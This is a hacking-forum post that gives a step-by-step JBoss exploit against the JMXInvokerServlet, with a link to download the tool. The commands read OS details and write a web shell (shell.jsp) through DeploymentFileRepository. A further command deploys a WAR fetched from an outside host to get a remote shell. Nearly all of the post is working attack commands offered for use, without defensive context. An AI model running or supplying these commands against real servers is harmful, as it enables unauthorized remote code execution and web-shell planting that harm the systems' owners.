HackerTop - View topic - jboss exploit
View unanswered posts | View active topics It is currently Wed Dec 19, 2018 10:00 am



Reply to topic  [ 1 post ] 
 jboss exploit 
Author Message
Site Admin
User avatar

Joined: Sun Jul 24, 2016 6:44 am
Posts: 18
Reply with quote
1. View system name
Code:
java -jar jboss_exploit_fat.jar -i http://127.0.0.1:8080/invoker/JMXInvokerServlet get jboss.system:type=ServerInfo OSName

2. View system version
Code:
java -jar jboss_exploit_fat.jar -i http://127.0.0.1:8080/invoker/JMXInvokerServlet get jboss.system:type=ServerInfo OSVersion

3.Remote create file
Code:
java -jar jboss_exploit_fat.jar -i http://127.0.0.1:8080/invoker/JMXInvokerServlet invoke jboss.admin:service=DeploymentFileRepository store myname.war index .jsp $content$ true -s java.lang.String;java.lang.String;java.lang.String;java.lang.String;java.lang.Boolean


$content$ function is the contents of the shell.jsp file

Upload the shell.jsp file to the server, deploy war to visit the place after success:
Code:
http://127.0.0.1:8080/myname/index.jsp


If myname shows OK is deployed successfully

4.Remote deployment war
Code:
java -jar jboss_exploit_fat.jar -i http://127.0.0.1:8080/invoker/JMXInvokerServlet invoke jboss.system:service=MainDeployer deploy http://scriptsgenie.com/demo/test.war

Get shell:
Code:
http://127.0.0.1:8080/test/shell.jsp


exploit download:

Attachment:
jboos_exp.zip [4.36 MiB]
Downloaded 92 times


Fri Aug 05, 2016 3:49 pm
Profile
Display posts from previous:  Sort by  
Reply to topic   [ 1 post ] 

You cannot post new topics in this forum
You cannot reply to topics in this forum
You cannot edit your posts in this forum
You cannot delete your posts in this forum
You cannot post attachments in this forum

Search for:
Jump to:  
cron
Copyright © 2003-2016 HackerTop. All rights reserved.
Privacy & Cookies Policy
Community Forum Software by phpBB